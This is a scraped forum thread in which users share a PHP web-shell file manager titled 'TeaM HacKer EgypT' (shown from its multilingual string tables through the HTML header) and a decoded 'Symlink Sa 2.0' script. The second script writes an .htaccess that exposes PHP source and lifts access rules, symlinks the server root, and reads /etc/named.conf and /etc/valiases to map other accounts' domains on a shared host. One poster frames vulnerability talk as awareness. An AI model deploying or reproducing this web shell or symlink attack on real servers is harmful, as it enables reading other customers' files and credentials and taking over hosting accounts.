    'not_symlinked' => 'Il link siambolico da "[%2]" a "[%1]" non  stato creato.',
    'permission_for' => 'Permessi di "[%1]":',
    'permission_set' => 'I permessi di "[%1]" sono stati impostati [%2].',
    'permission_not_set' => 'I permessi di "[%1]" non sono stati impostati [%2].',
    'not_readable' => '"[%1]" non puٍ essere letto.'
    		);
    
    	case 'nl':
    
    		$date_format = 'n/j/y H:i:s';
    		$word_charset = 'ISO-8859-1';
    
    		return array(
    'directory' => 'Directory',
    'file' => 'Bestand',
    'filename' => 'Bestandsnaam',
    
    'size' => 'Grootte',
    'permission' => 'Bevoegdheid',
    'owner' => 'Eigenaar',
    'group' => 'Groep',
    'other' => 'Anderen',
    'functions' => 'Functies',
    
    'read' => 'lezen',
    'write' => 'schrijven',
    'execute' => 'uitvoeren',
    
    'create_symlink' => 'maak symlink',
    'delete' => 'verwijderen',
    'rename' => 'hernoemen',
    'move' => 'verplaatsen',
    'copy' => 'kopieren',
    'edit' => 'bewerken',
    'download' => 'downloaden',
    'upload' => 'uploaden',
    'create' => 'aanmaken',
    'change' => 'veranderen',
    'save' => 'opslaan',
    'set' => 'instellen',
    'reset' => 'resetten',
    'relative' => 'Relatief pat naar doel',
    
    'yes' => 'Ja',
    'no' => 'Nee',
    'back' => 'terug',
    'destination' => 'Bestemming',
    'symlink' => 'Symlink',
    'no_output' => 'geen output',
    
    'user' => 'Gebruiker',
    'password' => 'Wachtwoord',
    'add' => 'toevoegen',
    'add_basic_auth' => 'add basic-authentification',
    
    'uploaded' => '"[%1]" is verstuurd.',
    'not_uploaded' => '"[%1]" kan niet worden verstuurd.',
    'already_exists' => '"[%1]" bestaat al.',
    'created' => '"[%1]" is aangemaakt.',
    'not_created' => '"[%1]" kan niet worden aangemaakt.',
    'really_delete' => 'Deze bestanden verwijderen?',
    'deleted' => "Deze bestanden zijn verwijderd:\n[%1]",
    'not_deleted' => "Deze bestanden konden niet worden verwijderd:\n[%1]",
    'rename_file' => 'Bestandsnaam veranderen:',
    'renamed' => '"[%1]" heet nu "[%2]".',
    'not_renamed' => '"[%1] kon niet worden veranderd in "[%2]".',
    'move_files' => 'Verplaats deze bestanden:',
    'moved' => "Deze bestanden zijn verplaatst naar \"[%2]\":\n[%1]",
    'not_moved' => "Kan deze bestanden niet verplaatsen naar \"[%2]\":\n[%1]",
    'copy_files' => 'Kopieer deze bestanden:',
    'copied' => "Deze bestanden zijn gekopieerd naar \"[%2]\":\n[%1]",
    'not_copied' => "Deze bestanden kunnen niet worden gekopieerd naar \"[%2]\":\n[%1]",
    'not_edited' => '"[%1]" kan niet worden bewerkt.',
    'executed' => "\"[%1]\" is met succes uitgevoerd:\n{%2}",
    'not_executed' => "\"[%1]\" is niet goed uitgevoerd:\n{%2}",
    'saved' => '"[%1]" is opgeslagen.',
    'not_saved' => '"[%1]" is niet opgeslagen.',
    'symlinked' => 'Symlink van "[%2]" naar "[%1]" is aangemaakt.',
    'not_symlinked' => 'Symlink van "[%2]" naar "[%1]" is niet aangemaakt.',
    'permission_for' => 'Bevoegdheid voor "[%1]":',
    'permission_set' => 'Bevoegdheid van "[%1]" is ingesteld op [%2].',
    'permission_not_set' => 'Bevoegdheid van "[%1]" is niet ingesteld op [%2].',
    'not_readable' => '"[%1]" kan niet worden gelezen.'
    		);
    
    	case 'se':
    
    		$date_format = 'n/j/y H:i:s';
    		$word_charset = 'ISO-8859-1';
     
    		return array(
    'directory' => 'Mapp',
    'file' => 'Fil',
    'filename' => 'Filnamn',
     
    'size' => 'Storlek',
    'permission' => 'SÙ†kerhetsnivÙ‡',
    'owner' => 'ؤgare',
    'group' => 'Grupp',
    'other' => 'Andra',
    'functions' => 'Funktioner',
     
    'read' => 'LÙ†s',
    'write' => 'Skriv',
    'execute' => 'Utfِr',
     
    'create_symlink' => 'Skapa symlink',
    'delete' => 'Radera',
    'rename' => 'Byt namn',
    'move' => 'Flytta',
    'copy' => 'Kopiera',
    'edit' => 'ؤndra',
    'download' => 'Ladda ner',
    'upload' => 'Ladda upp',
    'create' => 'Skapa',
    'change' => 'ؤndra',
    'save' => 'Spara',
    'set' => 'Markera',
    'reset' => 'Tِm',
    'relative' => 'Relative path to target',
     
    'yes' => 'Ja',
    'no' => 'Nej',
    'back' => 'Tillbaks',
    'destination' => 'Destination',
    'symlink' => 'Symlink',
    'no_output' => 'no output',
     
    'user' => 'AnvÙ†ndare',
    'password' => 'Lِsenord',
    'add' => 'LÙ†gg till',
    'add_basic_auth' => 'add basic-authentification',
     
    'uploaded' => '"[%1]" har laddats upp.',
    'not_uploaded' => '"[%1]" kunde inte laddas upp.',
    'already_exists' => '"[%1]" finns redan.',
    'created' => '"[%1]" har skapats.',
    'not_created' => '"[%1]" kunde inte skapas.',
    'really_delete' => 'Radera dessa filer?',
    'deleted' => "De hÙ†r filerna har raderats:\n[%1]",
    'not_deleted' => "Dessa filer kunde inte raderas:\n[%1]",
    'rename_file' => 'Byt namn pÙ‡ fil:',
    'renamed' => '"[%1]" har bytt namn till "[%2]".',
    'not_renamed' => '"[%1] kunde inte dِpas om till "[%2]".',
    'move_files' => 'Flytta dessa filer:',
    'moved' => "Dessa filer har flyttats till \"[%2]\":\n[%1]",
    'not_moved' => "Dessa filer kunde inte flyttas till \"[%2]\":\n[%1]",
    'copy_files' => 'Kopiera dessa filer:',
    'copied' => "Dessa filer har kopierats till \"[%2]\":\n[%1]",
    'not_copied' => "Dessa filer kunde inte kopieras till \"[%2]\":\n[%1]",
    'not_edited' => '"[%1]" kan inte Ù†ndras.',
    'executed' => "\"[%1]\" har utfِrts:\n{%2}",
    'not_executed' => "\"[%1]\" kunde inte utfِras:\n{%2}",
    'saved' => '"[%1]" har sparats.',
    'not_saved' => '"[%1]" kunde inte sparas.',
    'symlinked' => 'Symlink frÙ‡n "[%2]" till "[%1]" har skapats.',
    'not_symlinked' => 'Symlink frÙ‡n "[%2]" till "[%1]" kunde inte skapas.',
    'permission_for' => 'Rنttigheter fِr "[%1]":',
    'permission_set' => 'Rنttigheter fِr "[%1]" نndrades till [%2].',
    'permission_not_set' => 'Permission of "[%1]" could not be set to [%2].',
    'not_readable' => '"[%1]" kan inte lÙ†sas.'
    		);
    
    	case 'sp':
    
    		$date_format = 'j/n/y H:i:s';
    		$word_charset = 'ISO-8859-1';
    
    		return array(
    'directory' => 'Directorio',
    'file' => 'Archivo',
    'filename' => 'Nombre Archivo',
    
    'size' => 'TamaÙŒo',
    'permission' => 'Permisos',
    'owner' => 'Propietario',
    'group' => 'Grupo',
    'other' => 'Otros',
    'functions' => 'Funciones',
    
    'read' => 'lectura',
    'write' => 'escritura',
    'execute' => 'ejecuciÙŽn',
    
    'create_symlink' => 'crear enlace',
    'delete' => 'borrar',
    'rename' => 'renombrar',
    'move' => 'mover',
    'copy' => 'copiar',
    'edit' => 'editar',
    'download' => 'bajar',
    'upload' => 'subir',
    'create' => 'crear',
    'change' => 'cambiar',
    'save' => 'salvar',
    'set' => 'setear',
    'reset' => 'resetear',
    'relative' => 'Path relativo',
    
    'yes' => 'Si',
    'no' => 'No',
    'back' => 'atrÙ„s',
    'destination' => 'Destino',
    'symlink' => 'Enlace',
    'no_output' => 'sin salida',
    
    'user' => 'Usuario',
    'password' => 'Clave',
    'add' => 'agregar',
    'add_basic_auth' => 'agregar autentificaciÙŽn bÙ„sica',
    
    'uploaded' => '"[%1]" ha sido subido.',
    'not_uploaded' => '"[%1]" no pudo ser subido.',
    'already_exists' => '"[%1]" ya existe.',
    'created' => '"[%1]" ha sido creado.',
    'not_created' => '"[%1]" no pudo ser creado.',
    'really_delete' => 'ØŸBorra estos archivos?',
    'deleted' => "Estos archivos han sido borrados:\n[%1]",
    'not_deleted' => "Estos archivos no pudieron ser borrados:\n[%1]",
    'rename_file' => 'Renombra archivo:',
    'renamed' => '"[%1]" ha sido renombrado a "[%2]".',
    'not_renamed' => '"[%1] no pudo ser renombrado a "[%2]".',
    'move_files' => 'Mover estos archivos:',
    'moved' => "Estos archivos han sido movidos a \"[%2]\":\n[%1]",
    'not_moved' => "Estos archivos no pudieron ser movidos a \"[%2]\":\n[%1]",
    'copy_files' => 'Copiar estos archivos:',
    'copied' => "Estos archivos han sido copiados a  \"[%2]\":\n[%1]",
    'not_copied' => "Estos archivos no pudieron ser copiados \"[%2]\":\n[%1]",
    'not_edited' => '"[%1]" no pudo ser editado.',
    'executed' => "\"[%1]\" ha sido ejecutado correctamente:\n{%2}",
    'not_executed' => "\"[%1]\" no pudo ser ejecutado correctamente:\n{%2}",
    'saved' => '"[%1]" ha sido salvado.',
    'not_saved' => '"[%1]" no pudo ser salvado.',
    'symlinked' => 'Enlace desde "[%2]" a "[%1]" ha sido creado.',
    'not_symlinked' => 'Enlace desde "[%2]" a "[%1]" no pudo ser creado.',
    'permission_for' => 'Permisos de "[%1]":',
    'permission_set' => 'Permisos de "[%1]" fueron seteados a [%2].',
    'permission_not_set' => 'Permisos de "[%1]" no pudo ser seteado a [%2].',
    'not_readable' => '"[%1]" no pudo ser leÙŠdo.'
    		);
    
    	case 'dk':
    
    		$date_format = 'n/j/y H:i:s';
    		$word_charset = 'ISO-8859-1';
    
    		return array(
    'directory' => 'Mappe',
    'file' => 'Fil',
    'filename' => 'Filnavn',
    
    'size' => 'StÙ‘rrelse',
    'permission' => 'Rettighed',
    'owner' => 'Ejer',
    'group' => 'Gruppe',
    'other' => 'Andre',
    'functions' => 'Funktioner',
    
    'read' => 'lÙˆs',
    'write' => 'skriv',
    'execute' => 'kÙ‘r',
    
    'create_symlink' => 'opret symbolsk link',
    'delete' => 'slet',
    'rename' => 'omdÙ‘b',
    'move' => 'flyt',
    'copy' => 'kopier',
    'edit' => 'rediger',
    'download' => 'download',
    'upload' => 'upload',
    'create' => 'opret',
    'change' => 'skift',
    'save' => 'gem',
    'set' => 'sÙˆt',
    'reset' => 'nulstil',
    'relative' => 'Relativ sti til valg',
    
    'yes' => 'Ja',
    'no' => 'Nej',
    'back' => 'tilbage',
    'destination' => 'Distination',
    'symlink' => 'Symbolsk link',
    'no_output' => 'ingen resultat',
    
    'user' => 'Bruger',
    'password' => 'Kodeord',
    'add' => 'tilfÙ‘j',
    'add_basic_auth' => 'tilfÙ‘j grundliggende rettigheder',
    
    'uploaded' => '"[%1]" er blevet uploaded.',
    'not_uploaded' => '"[%1]" kunnu ikke uploades.',
    'already_exists' => '"[%1]" findes allerede.',
    'created' => '"[%1]" er blevet oprettet.',
    'not_created' => '"[%1]" kunne ikke oprettes.',
    'really_delete' => 'Slet disse filer?',
    'deleted' => "Disse filer er blevet slettet:\n[%1]",
    'not_deleted' => "Disse filer kunne ikke slettes:\n[%1]",
    'rename_file' => 'OmdÙ‘d fil:',
    'renamed' => '"[%1]" er blevet omdÙ‘bt til "[%2]".',
    'not_renamed' => '"[%1] kunne ikke omdÙ‘bes til "[%2]".',
    'move_files' => 'Flyt disse filer:',
    'moved' => "Disse filer er blevet flyttet til \"[%2]\":\n[%1]",
    'not_moved' => "Disse filer kunne ikke flyttes til \"[%2]\":\n[%1]",
    'copy_files' => 'Kopier disse filer:',
    'copied' => "Disse filer er kopieret til \"[%2]\":\n[%1]",
    'not_copied' => "Disse filer kunne ikke kopieres til \"[%2]\":\n[%1]",
    'not_edited' => '"[%1]" kan ikke redigeres.',
    'executed' => "\"[%1]\" er blevet kÙ‘rt korrekt:\n{%2}",
    'not_executed' => "\"[%1]\" kan ikke kÙ‘res korrekt:\n{%2}",
    'saved' => '"[%1]" er blevet gemt.',
    'not_saved' => '"[%1]" kunne ikke gemmes.',
    'symlinked' => 'Symbolsk link fra "[%2]" til "[%1]" er blevet oprettet.',
    'not_symlinked' => 'Symbolsk link fra "[%2]" til "[%1]" kunne ikke oprettes.',
    'permission_for' => 'Rettigheder for "[%1]":',
    'permission_set' => 'Rettigheder for "[%1]" blev sat til [%2].',
    'permission_not_set' => 'Rettigheder for "[%1]" kunne ikke sÙˆttes til [%2].',
    'not_readable' => '"[%1]" Kan ikke lÙˆses.'
    		);
    
    	case 'tr':
    
    		$date_format = 'n/j/y H:i:s';
    		$word_charset = 'ISO-8859-1';
    
    		return array(
    'directory' => 'Klasِr',
    'file' => 'Dosya',
    'filename' => 'dosya adi',
    
    'size' => 'boyutu',
    'permission' => 'Izin',
    'owner' => 'sahib',
    'group' => 'Grup',
    'other' => 'Digerleri',
    'functions' => 'Fonksiyonlar',
    
    'read' => 'oku',
    'write' => 'yaz',
    'execute' => 'alistir',
    
    'create_symlink' => 'yarat symlink',
    'delete' => 'sil',
    'rename' => 'ad degistir',
    'move' => 'tasi',
    'copy' => 'kopyala',
    'edit' => 'dzenle',
    'download' => 'indir',
    'upload' => 'ykle',
    'create' => 'create',
    'change' => 'degistir',
    'save' => 'kaydet',
    'set' => 'ayar',
    'reset' => 'sifirla',
    'relative' => 'Hedef yola gِre',
    
    'yes' => 'Evet',
    'no' => 'Hayir',
    'back' => 'Geri',
    'destination' => 'Hedef',
    'symlink' => 'K‎sa yol',
    'no_output' => 'ikti yok',
    
    'user' => 'Kullanici',
    'password' => 'Sifre',
    'add' => 'ekle',
    'add_basic_auth' => 'ekle basit-authentification',
    
    'uploaded' => '"[%1]" yklendi.',
    'not_uploaded' => '"[%1]" yklenemedi.',
    'already_exists' => '"[%1]" kullanilmakta.',
    'created' => '"[%1]" olusturuldu.',
    'not_created' => '"[%1]" olusturulamadi.',
    'really_delete' => 'Bu dosyalari silmek istediginizden eminmisiniz?',
    'deleted' => "Bu dosyalar silindi:\n[%1]",
    'not_deleted' => "Bu dosyalar silinemedi:\n[%1]",
    'rename_file' => 'Adi degisen dosya:',
    'renamed' => '"[%1]" adili dosyanin yeni adi "[%2]".',
    'not_renamed' => '"[%1] adi degistirilemedi "[%2]" ile.',
    'move_files' => 'Tasinan dosyalar:',
    'moved' => "Bu dosyalari tasidiginiz yer \"[%2]\":\n[%1]",
    'not_moved' => "Bu dosyalari tasiyamadiginiz yer \"[%2]\":\n[%1]",
    'copy_files' => 'Kopyalanan dosyalar:',
    'copied' => "Bu dosyalar kopyalandi \"[%2]\":\n[%1]",
    'not_copied' => "Bu dosyalar kopyalanamiyor \"[%2]\":\n[%1]",
    'not_edited' => '"[%1]" dzenlenemiyor.',
    'executed' => "\"[%1]\" basariyla alistirildi:\n{%2}",
    'not_executed' => "\"[%1]\" alistirilamadi:\n{%2}",
    'saved' => '"[%1]" kaydedildi.',
    'not_saved' => '"[%1]" kaydedilemedi.',
    'symlinked' => '"[%2]" den "[%1]" e k‎sayol olu‏turuldu.',
    'not_symlinked' => '"[%2]"den "[%1]" e k‎sayol olu‏turulamad‎.',
    'permission_for' => 'Izinler "[%1]":',
    'permission_set' => 'Izinler "[%1]" degistirildi [%2].',
    'permission_not_set' => 'Izinler "[%1]" degistirilemedi [%2].',
    'not_readable' => '"[%1]" okunamiyor.'
    		);
    
    	case 'cs':
    
    		$date_format = 'd.m.y H:i:s';
    		$word_charset = 'UTF-8';
    
    		return array(
    'directory' => 'Adresأ،إ™',
    'file' => 'Soubor',
    'filename' => 'Jmأno souboru',
    
    'size' => 'Velikost',
    'permission' => 'Prأ،va',
    'owner' => 'Vlastnأ*k',
    'group' => 'Skupina',
    'other' => 'Ostatnأ*',
    'functions' => 'Funkce',
    
    'read' => 'ؤŒtenأ*',
    'write' => 'Zأ،pis',
    'execute' => 'Spouإ،tؤ›nأ*',
    
    'create_symlink' => 'Vytvoإ™it symbolickأ odkaz',
    'delete' => 'Smazat',
    'rename' => 'Pإ™ejmenovat',
    'move' => 'Pإ™esunout',
    'copy' => 'Zkopأ*rovat',
    'edit' => 'Otevإ™أ*t',
    'download' => 'Stأ،hnout',
    'upload' => 'Nahraj na server',
    'create' => 'Vytvoإ™it',
    'change' => 'Zmؤ›nit',
    'save' => 'Uloإit',
    'set' => 'Nastavit',
    'reset' => 'zpؤ›t',
    'relative' => 'Relatif',
    
    'yes' => 'Ano',
    'no' => 'Ne',
    'back' => 'Zpؤ›t',
    'destination' => 'Destination',
    'symlink' => 'Symbolickأ odkaz',
    'no_output' => 'Prأ،zdnأ vأstup',
    
    'user' => 'UØ¥ivatel',
    'password' => 'Heslo',
    'add' => 'Pإ™idat',
    'add_basic_auth' => 'pإ™idej zأ،kladnأ* autentizaci',
    
    'uploaded' => 'Soubor "[%1]" byl nahrأ،n na server.',
    'not_uploaded' => 'Soubor "[%1]" nebyl nahrأ،n na server.',
    'already_exists' => 'Soubor "[%1]" uإ exituje.',
    'created' => 'Soubor "[%1]" byl vytvoإ™en.',
    'not_created' => 'Soubor "[%1]" nemohl bأt  vytvoإ™en.',
    'really_delete' => 'Vymazat soubor?',
    'deleted' => "Byly vymazأ،ny tyto soubory:\n[%1]",
    'not_deleted' => "Tyto soubory nemohly bأt vytvoإ™eny:\n[%1]",
    'rename_file' => 'Pإ™ejmenuj soubory:',
    'renamed' => 'Soubor "[%1]" byl pإ™ejmenovأ،n na "[%2]".',
    'not_renamed' => 'Soubor "[%1]" nemohl bأt pإ™ejmenovأ،n na "[%2]".',
    'move_files' => 'Pإ™emأ*stit tyto soubory:',
    'moved' => "Tyto soubory byly pإ™emأ*stؤ›ny do \"[%2]\":\n[%1]",
    'not_moved' => "Tyto soubory nemohly bأt pإ™emأ*stؤ›ny do \"[%2]\":\n[%1]",
    'copy_files' => 'Zkopأ*rovat tyto soubory:',
    'copied' => "Tyto soubory byly zkopأ*rovأ،ny do \"[%2]\":\n[%1]",
    'not_copied' => "Tyto soubory nemohly bأt zkopأ*rovأ،ny do \"[%2]\":\n[%1]",
    'not_edited' => 'Soubor "[%1]" nemohl bأt otevإ™en.',
    'executed' => "SOubor \"[%1]\" byl spuإ،tؤ›n :\n{%2}",
    'not_executed' => "Soubor \"[%1]\" nemohl bأt spuإ،tؤ›n:\n{%2}",
    'saved' => 'Soubor "[%1]" byl uloإen.',
    'not_saved' => 'Soubor "[%1]" nemohl bأt uloإen.',
    'symlinked' => 'Byl vyvoإ™en symbolickأ odkaz "[%2]" na soubor "[%1]".',
    'not_symlinked' => 'Symbolickأ odkaz "[%2]" na soubor "[%1]" nemohl bأt vytvoإ™en.',
    'permission_for' => 'Prأ،va k "[%1]":',
    'permission_set' => 'Prأ،va k "[%1]" byla zmؤ›nؤ›na na [%2].',
    'permission_not_set' => 'Prأ،va k "[%1]" nemohla bأt zmؤ›nؤ›na na [%2].',
    'not_readable' => 'Soubor "[%1]" nenأ* moإno pإ™eؤچأ*st.'
    		);
    
    	case 'en':
    	default:
    
    		$date_format = 'n/j/y H:i:s';
    		$word_charset = 'ISO-8859-1';
    
    		return array(
    'directory' => 'Directory',
    'file' => 'File',
    'filename' => 'Filename',
    
    'size' => 'Size',
    'permission' => 'Permission',
    'owner' => 'Owner',
    'group' => 'Group',
    'other' => 'Others',
    'functions' => 'Functions',
    
    'read' => 'read',
    'write' => 'write',
    'execute' => 'execute',
    
    'create_symlink' => 'create symlink',
    'delete' => 'delete',
    'rename' => 'rename',
    'move' => 'move',
    'copy' => 'copy',
    'edit' => 'edit',
    'download' => 'download',
    'upload' => 'upload',
    'create' => 'create',
    'change' => 'change',
    'save' => 'save',
    'set' => 'set',
    'reset' => 'reset',
    'relative' => 'Relative path to target',
    
    'yes' => 'Yes',
    'no' => 'No',
    'back' => 'back',
    'destination' => 'Destination',
    'symlink' => 'Symlink',
    'no_output' => 'no output',
    
    'user' => 'User',
    'password' => 'Password',
    'add' => 'add',
    'add_basic_auth' => 'add basic-authentification',
    
    'uploaded' => '"[%1]" has been uploaded.',
    'not_uploaded' => '"[%1]" could not be uploaded.',
    'already_exists' => '"[%1]" already exists.',
    'created' => '"[%1]" has been created.',
    'not_created' => '"[%1]" could not be created.',
    'really_delete' => 'Delete these files?',
    'deleted' => "These files have been deleted:\n[%1]",
    'not_deleted' => "These files could not be deleted:\n[%1]",
    'rename_file' => 'Rename file:',
    'renamed' => '"[%1]" has been renamed to "[%2]".',
    'not_renamed' => '"[%1] could not be renamed to "[%2]".',
    'move_files' => 'Move these files:',
    'moved' => "These files have been moved to \"[%2]\":\n[%1]",
    'not_moved' => "These files could not be moved to \"[%2]\":\n[%1]",
    'copy_files' => 'Copy these files:',
    'copied' => "These files have been copied to \"[%2]\":\n[%1]",
    'not_copied' => "These files could not be copied to \"[%2]\":\n[%1]",
    'not_edited' => '"[%1]" can not be edited.',
    'executed' => "\"[%1]\" has been executed successfully:\n{%2}",
    'not_executed' => "\"[%1]\" could not be executed successfully:\n{%2}",
    'saved' => '"[%1]" has been saved.',
    'not_saved' => '"[%1]" could not be saved.',
    'symlinked' => 'Symlink from "[%2]" to "[%1]" has been created.',
    'not_symlinked' => 'Symlink from "[%2]" to "[%1]" could not be created.',
    'permission_for' => 'Permission of "[%1]":',
    'permission_set' => 'Permission of "[%1]" was set to [%2].',
    'permission_not_set' => 'Permission of "[%1]" could not be set to [%2].',
    'not_readable' => '"[%1]" can not be read.'
    		);
    
    	}
    
    }
    
    function getimage ($image) {
    	switch ($image) {
    	case 'file':
    		return base64_decode('R0lGODlhEQANAJEDAJmZmf///wAAAP///yH5BAHoAwMALAAAAAARAA0AAAItnIGJxg0B42rsiSvCA/REmXQWhmnih3LUSGaqg35vFbSXucbSabunjnMohq8CADsA');
    	case 'folder':
    		return base64_decode('R0lGODlhEQANAJEDAJmZmf///8zMzP///yH5BAHoAwMALAAAAAARAA0AAAIqnI+ZwKwbYgTPtIudlbwLOgCBQJYmCYrn+m3smY5vGc+0a7dhjh7ZbygAADsA');
    	case 'hidden_file':
    		return base64_decode('R0lGODlhEQANAJEDAMwAAP///5mZmf///yH5BAHoAwMALAAAAAARAA0AAAItnIGJxg0B42rsiSvCA/REmXQWhmnih3LUSGaqg35vFbSXucbSabunjnMohq8CADsA');
    	case 'link':
    		return base64_decode('R0lGODlhEQANAKIEAJmZmf///wAAAMwAAP///wAAAAAAAAAAACH5BAHoAwQALAAAAAARAA0AAAM5SArcrDCCQOuLcIotwgTYUllNOA0DxXkmhY4shM5zsMUKTY8gNgUvW6cnAaZgxMyIM2zBLCaHlJgAADsA');
    	case 'smiley':
    		return base64_decode('R0lGODlhEQANAJECAAAAAP//AP///wAAACH5BAHoAwIALAAAAAARAA0AAAIslI+pAu2wDAiz0jWD3hqmBzZf1VCleJQch0rkdnppB3dKZuIygrMRE/oJDwUAOwA=');
    	case 'arrow':
    		return base64_decode('R0lGODlhEQANAIABAAAAAP///yH5BAEKAAEALAAAAAARAA0AAAIdjA9wy6gNQ4pwUmav0yvn+hhJiI3mCJ6otrIkxxQAOw==');
    	}
    }
    
    function html_header () {
    	global $site_charset;
    
    	echo <<<END
    <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
         "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
    <html xmlns="http://www.w3.org/1999/xhtml">
    <head>
    
    <meta http-equiv="Content-Type" content="text/html; charset=$site_charset" />
    
    <title>TeaM HacKer EgypT</title>
    
    <style type="text/css">
    body { font: small sans-serif; text-align: center }
    img { width: 17px; height: 13px }
    a, a:visited { text-decoration: none; color: navy }
    hr { border-style: none; height: 1px; background-color: silver; color: silver }
    #main { margin-top: 6pt; margin-left: auto; margin-right: auto; border-spacing: 1px }
    #main th { background: #eee; padding: 3pt 3pt 0pt 3pt }
    .listing th, .listing td { padding: 1px 3pt 0 3pt }
    .listing th { border: 1px solid silver }
    .listing td { border: 1px solid #ddd; background: white }
    .listing .checkbox { text-align: center }
    .listing .filename { text-align: left }
    .listing .size { text-align: right }
    .listing .permission_header { text-align: left }
    .listing .permission { font-family: monospace }
    .listing .owner { text-align: left }
    .listing .group { text-align: left }
    .listing .functions { text-align: left }
    .listing_footer td { background: #eee; border: 1px solid silver }
    #directory, #upload, #create, .listing_footer td, #error td, #notice td { text-align: left; padding: 3pt }
    #directory { background: #eee; border: 1px solid silver }
    #upload { padding-top: 1em }
    #create { padding-bottom: 1em }
    .small, .small option { font-size: x-small }
    textarea { border: none; background: white }
    table.dialog { margin-left: auto; margin-right: auto }
    td.dialog { background: #eee; padding: 1ex; border: 1px solid silver; text-align: center }
    #permission { margin-left: auto; margin-right: auto }
    #permission td { padding-left: 3pt; padding-right: 3pt; text-align: center }
    td.permission_action { text-align: right }
    #symlink { background: #eee; border: 1px solid silver }
    #symlink td { text-align: left; padding: 3pt }
    #red_button { width: 120px; color: #400 }
    #green_button { width: 120px; color: #040 }
    #error td { background: maroon; color: white; border: 1px solid silver }
    #notice td { background: green; color: white; border: 1px solid silver }
    #notice pre, #error pre { background: silver; color: black; padding: 1ex; margin-left: 1ex; margin-right: 1ex }
    code { font-size: 12pt }
    td { white-space: nowrap }
    </style>
    
    <script type="text/javascript">
    <!--
    function activate (name) {
    	if (document && document.forms[0] && document.forms[0].elements['focus']) {
    		document.forms[0].elements['focus'].value = name;
    	}
    }
    //-->
    </script>
    
    </head>
    <body>
    
    
    END;
    
    }
    
    function html_footer () {
    
    	echo <<<END
    </body>
    </html>
    END;
    
    }
    
    function notice ($phrase) {
    	global $cols;
    
    	$args = func_get_args();
    	array_shift($args);
    
    	return '<tr id="notice">
    	<td colspan="' . $cols . '">' . phrase($phrase, $args) . '</td>
    </tr>
    ';
    
    }
    
    function error ($phrase) {
    	global $cols;
    
    	$args = func_get_args();
    	array_shift($args);
    
    	return '<tr id="error">
    	<td colspan="' . $cols . '">' . phrase($phrase, $args) . '</td>
    </tr>
    ';
    
    }
    
    ?>
    
     
    • Thanks Thanks x 1
  17. Adam Xtubeage

    Adam Xtubeage Jr. VIP Jr. VIP Premium Member

    Joined:
    Jan 31, 2012
    Messages:
    143
    Likes Received:
    73
    Occupation:
    IM & ENJOYING LIFE & STUDYING....!
    Location:
    PARADISE
    hey mate i know it was from google...
    i just gave him an example i did not claim that i have found it...:p

    and you telling not to google...who does not google nowadays....bro google is the center for all things...does not matter of what category it is...so i just found that gave him for understanding...and of course...i know it was not "sql injection" so what's the deal...i just mention as it is still the number one vulnerability in "OWASP" and i hope you know that...:D so I wrote so that others keep checking about that as many forget the main thing of securing themselves...:p

    And if you think i did some mistake by posting about the vulnerabilities...then you can surely think that ...i have no problem...my aim was just to make all aware...so that they don't forget the main thing of securing themselves first.....:D


    ANYWAY THANKS FOR YOUR COMMENT......:D
     
  18. sockpuppet

    sockpuppet Junior Member

    Joined:
    Nov 7, 2011
    Messages:
    155
    Likes Received:
    145
    i have decoded the script from the url in the first post, actually a copy on pastebin
    Symlink Sa 2.0:
    Code:
    echo '  <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
        "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
    
    <html xmlns="http://www.w3.org/1999/xhtml">
    
    <head>
    <title>Symlink_Sa 2.0</title>
    
    <style type="text/css">
    
      html,body {
         margin: 0;
         padding: 0;
         outline: 0;
    }
    
    
    body {
        direction: ltr;
        background-color:#F4F4F4;
    	color: rgb(153, 153, 153);
        text-align: center
    }
    
    input,textarea,select{
    font-weight: bold;
    color: #111111;
    dashed #ffffff;
    border: 1px
    solid #BBBBBB;
    background-color: #DDDDDD;
    }
    
    
    .hedr {
      font-family: Tahoma, Arial, sans-serif  ;
      font-size: 22px;
    
    
    }
    
    .cont a{
    
     text-decoration: none;
     color:rgb(153, 153, 153);
     font-family: Tahoma, Arial, sans-serif  ;
     font-size: 16px;
     text-shadow: 0px 0px 3px ;
    }
    
    .cont a:hover{
    
    
      color: #EEEEEE ;
      text-shadow:0px 0px 3px #000000 ;
    
    
    }
    
    .tmp tr td{
    
    border: solid 1px #BBBBBB;
    
    padding: 2px ;
      font-size: 13px;
    }
    
    .tmp tr td a {
      text-decoration: none;
    
    
    
    }
    
    .foter{
      font-size: 9pt;
      color: #AAAAAA ;
      text-align: center
    }
    
    .tmp tr td:hover{
    
    box-shadow: 0px 0px 4px #888888;
    
    }
    .fot{
    
    font-family:Tahoma, Arial, sans-serif;
    
      font-size: 13pt;
    }
    
    .ir {
      color: #FF0000;
    }
    
    
    
    </style>
    
    </head>
    
    <body>
    
    <div class=\'all\'>
    
    
    ';
    @mkdir('sym',0777);
    $IIIIIIIIIIl1  = "Options all \n DirectoryIndex Sux.html \n AddType text/plain .php \n AddHandler server-parsed .php \n  AddType text/plain .html \n AddHandler txt .html \n Require None \n Satisfy Any";
    $IIIIIIIIII1I =@fopen ('sym/.htaccess','w');
    fwrite($IIIIIIIIII1I ,$IIIIIIIIIIl1);
    @symlink('/','sym/root');
    $IIIIIIIIIlIl = basename('/home/sockpuppet/www/fuck/org.php');
    echo '<br /><div class="hedr"> Symlink Sa 2.0 <br /></div>';
    echo '<br /><div class="hedr">-:[ User & Domains & Symlink ]:-<br /><br /></div>';
    echo '<div class="cont">
    
    [<a href="?"> Home </a>]
    
    [<a href="?sws=sym"> User & Domains & Symlink </a>]
    
    [<a href="?sws=sec"> Domains & Script </a>]
    
    [ <a href="?sws=file"> Symlink File </a>]<br /><br /><br />
    
    
    
    
    
    
    </div>';
    if(isset($_REQUEST['sws']))
    {
    switch ($_REQUEST['sws'])
    {
    case 'sec':
    $IIIIIIIIIllI = @file('/etc/named.conf');
    if(!$IIIIIIIIIllI)
    {
    die (" can't read /etc/named.conf");
    }
    else
    {
    echo "<div class='tmp'>
    <table align='center' width='40%'><td> Domains </td><td> Script </td>";
    foreach($IIIIIIIIIllI as $IIIIIIIIIll1){
    if(eregi('zone',$IIIIIIIIIll1)){
    preg_match_all('#zone "(.*)"#',$IIIIIIIIIll1,$IIIIIIIIIl11);
    flush();
    if(strlen(trim($IIIIIIIIIl11[1][0])) >2){
    $IIIIIIIII1I1 = posix_getpwuid(@fileowner('/etc/valiases/'.$IIIIIIIIIl11[1][0]));
